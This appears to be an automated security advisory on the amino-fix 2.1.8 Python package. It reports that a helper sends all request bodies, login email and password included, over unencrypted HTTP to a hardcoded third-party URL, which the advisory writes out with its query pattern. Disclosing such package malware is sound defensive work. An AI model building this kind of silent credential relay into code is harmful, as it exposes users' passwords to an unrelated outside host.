amino-fix @2.1.8

Summary

The asyncfix subpackage's signature() helper in aminofix/asyncfix/lib/util/helpers.py (lines 22-25) does not compute the NDC-MSG-SIG locally. Instead, every JSON request body is sent as a query string to http://aminoed.uk.to/api/generator/ndc-msg-sig?data={data} over unencrypted HTTP. This helper is invoked by every authenticated endpoint of the library, including client.login(email, password) — the advertised primary function. As a result, any caller using the async API silently transmits the end-user's plaintext email and password (and all other request bodies) as URL query parameters to aminoed.uk.to , a free .uk.to subdomain unrelated to the real Amino service ( service.narvii.com ). This is a textbook silent-relay: a hardcoded third-party destination embedded in public API code that exfiltrates caller-supplied credentials without disclosure, over plaintext HTTP with no TLS. A secondary import-time version-check against pypi.org is benign (data-only, printed to stdout) and not a dropper, but is noted as an unrelated quality issue.

Source: amazon-inspector (807db606fec148f1acf0e1ddb4ec2e0a68ba672bb8e5641f9eefd0d425f30a44)